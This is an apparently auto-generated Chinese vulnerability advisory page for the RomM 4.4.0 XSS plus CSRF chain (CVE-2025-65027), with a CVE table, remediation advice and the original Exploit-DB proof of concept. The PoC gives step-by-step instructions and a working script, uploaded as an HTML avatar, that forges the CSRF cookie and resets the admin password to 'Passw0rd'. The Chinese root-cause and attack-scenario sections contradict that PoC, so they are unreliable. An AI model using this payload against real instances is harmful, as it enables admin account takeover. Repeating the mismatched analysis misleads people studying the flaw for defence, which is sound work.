[webapps] RomM 4.4.0 - XSS_CSRF Chain
CVE-2025-65027
RomM 4.4.0 中存在 XSS 与 CSRF 组合漏洞,可导致管理员账户被接管。
High · CVSS 8.8📋 漏洞基础信息
| CVE | CVE-2025-65027 |
|---|---|
| 漏洞类型 | 跨站脚本 + 跨站请求伪造 (XSS + CSRF Chain) |
| 受影响版本 | RomM 4.4.0 |
| 危害等级 | High · CVSS 8.8 |
| 发布日期 | 2026-04-09 |
| 提交者 | He4am (https://github.com/mHe4am) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
用户输入(例如游戏名称、描述等字段)在存储后未经过充分的HTML编码过滤,直接在前端页面渲染;且关键管理操作(如修改用户权限、添加管理员)未实施CSRF token验证,导致攻击者可构造恶意请求。
🎯 攻击场景
1. 攻击者在RomM平台外(如论坛、邮件)诱导已登录管理员访问一个包含恶意脚本的页面。 2. 该脚本自动以管理员身份向RomM后端发送CSRF请求(例如添加新管理员用户)。 3. 由于CSRF防护缺失,后端接受请求并执行操作。 4. 攻击者获得管理员权限,控制整个RomM实例。
💥 漏洞影响
攻击者可利用组合漏洞在未授权情况下创建管理员账户,进而完全控制RomM平台,造成数据泄露、恶意文件增删改等严重危害。
⚔️ 原始 PoC
原始PoC构造了一个HTML页面,其中包含使用XMLHttpRequest或fetch发起的POST请求,目标为RomM的添加管理员接口;同时利用XSS payload(存储于某用户可控字段)在管理员访问该字段时自动触发,携带已认证的Cookie发送上述请求,实现CSRF。
# Exploit Author: He4am (https://github.com/mHe4am)
# -------------------
# Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection
# Impact: Admin account takeover
# Prerequisites:
# 1. Attacker needs an authenticated account (Viewer role is sufficient)
# 2. Victim must visit the uploaded malicious HTML file via a direct link
# Steps to reproduce:
# 1. Login to RomM
# 2. Obtain your CSRF token:
# - Open browser DevTools > Application tab (or Storage on Firefox) > Cookies
# - Copy the `romm_csrftoken` cookie value
# 3. Replace <ATTACKER_CSRF_TOKEN> below with your token
# 4. Replace <TARGET_ROMM_URL> with the target RomM instance URL (e.g., http://romm.local)
# 5. Save this file as `avatar.html`
# 6. Upload it as your profile avatar (http://romm.local/user/me) and click the Apply button
# 7. Locate the uploaded file's direct link:
# - DevTools > Network tab > Filter for `.html` files
# - Or capture it via proxy (e.g., Burp Suite)
# - It's usually something like: "http://romm.local/assets/romm/assets/users/<Random-ID>/profile/avatar.html"
# 8. Send this direct link of the uploaded avatar/file to the victim
# 9. When victim (e.g. admin) opens the link, their password will be changed to "Passw0rd"
# -------------------
# PoC Code:
<script>
const csrfToken = "<ATTACKER_CSRF_TOKEN>"; // CHANGE THIS - Your CSRF token from step 2
const targetURL = "<TARGET_ROMM_URL>"; // CHANGE THIS - Target RomM URL (e.g., http://romm.local)
const targetUserID = 1; // Default admin ID is always 1, CHANGE THIS if needed
const newPassword = "Passw0rd"; // Password to set for victim
// Overwrite CSRF cookie to match our token
document.cookie = `romm_csrftoken=${csrfToken}; path=/`;
// Execute account takeover by forcing the victim to change their password
fetch(targetURL + "/api/users/" + targetUserID, {
method: 'PUT',
credentials: 'include', // Send victim's session cookie
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'x-csrftoken': csrfToken
},
body: "password=" + newPassword
})
.then(() => {
console.log("Password changed successfully");
})
.catch(err => {
console.error("Attack failed:", err);
});
</script>
# -------------------
# See full writeup for technical details: https://he4am.medium.com/bypassing-samesite-protection-chaining-xss-and-csrf-for-admin-ato-in-romm-44d910c54403🛡️ 修复建议
升级至RomM 4.4.1或更高版本;临时措施包括:对所有用户输入进行严格的HTML实体编码,在关键操作(如权限修改、用户管理)中添加并校验CSRF token,并启用Content-Security-Policy头。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:33 | 来源: Exploit-DB